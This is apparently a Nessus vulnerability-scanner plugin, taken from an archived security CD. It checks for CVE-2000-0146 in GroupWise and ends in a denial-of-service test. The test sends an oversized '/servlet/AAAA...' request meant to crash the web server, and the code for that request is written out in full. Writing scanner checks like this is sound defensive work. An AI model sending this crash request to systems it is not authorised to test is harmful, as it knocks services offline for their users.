home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / groupwise_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  87 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. # Axel Nennker axel@nennker.de
  7. # I got false positive from this script in revision 1.7
  8. # Therefore I added an extra check before the attack and
  9. # rephrased the description. 20020306
  10.  
  11. if(description)
  12. {
  13.  script_id(10097);
  14.  script_bugtraq_id(972);
  15.  script_version ("$Revision: 1.13 $");
  16.  script_cve_id("CVE-2000-0146");
  17.  name["english"] = "GroupWise buffer overflow";
  18.  name["francais"] = "DΘpassement de buffer dans GroupWise";
  19.  script_name(english:name["english"], francais:name["francais"]);
  20.  
  21.  desc["english"] = "It is possible to make the remote web-server
  22. crash by doing the request :
  23.  
  24.     GET /servlet/AAAA...AAAA
  25.     
  26.  
  27. Risk factor : High
  28. Solution :  If the server is a Groupwise server, then install GroupWise Enhancement Pack 5.5 Sp1";
  29.  
  30.  
  31.  desc["francais"] = "
  32. Il est possible de faire planter le serveur GroupWise distant
  33. en faisant la requete :
  34.     GET /servlet/AAAA..AAAA
  35.  
  36. Facteur de risque : ElevΘ
  37. Solution : Installez GroupWise Enhancement Pack 5.5 Sp1";
  38.  
  39.  script_description(english:desc["english"], francais:desc["francais"]);
  40.  
  41.  summary["english"] = "IIS buffer overflow";
  42.  summary["francais"] = "DΘpassement de buffer dans IIS";
  43.  script_summary(english:summary["english"], francais:summary["francais"]);
  44.  
  45.  script_category(ACT_DENIAL);
  46.  
  47.  
  48.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  49.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  50.  family["english"] = "Denial of Service";
  51.  family["francais"] = "DΘni de service";
  52.  script_family(english:family["english"], francais:family["francais"]);
  53.  script_dependencie("find_service.nes", "www_too_long_url.nasl");
  54.  script_exclude_keys("www/too_long_url_crash");
  55.  script_require_ports("Services/www", 80);
  56.  exit(0);
  57. }
  58.  
  59. #
  60. # The script code starts here
  61. #
  62.  
  63. include("http_func.inc");
  64.  
  65. # if the server already crashes because of a too long
  66. # url, go away
  67.  
  68. too_long = get_kb_item("www/too_long_url_crash");
  69. if(too_long)exit(0);
  70.  
  71. port = get_http_port(default:80);
  72.  
  73. if(!get_port_state(port)) exit(0);
  74.  
  75. if(http_is_dead(port:port))exit(0);
  76.  
  77. # now try to crash the server
  78. soc = http_open_socket(port);
  79. if(!soc) exit(0);
  80. data = string("/servlet/", crap(400));
  81. data = http_get(item:data, port:port);
  82. send(socket:soc, data:data);
  83. r = http_recv(socket:soc);
  84. http_close_socket(soc);
  85.  
  86. if(http_is_dead(port:port))security_hole(port);
  87.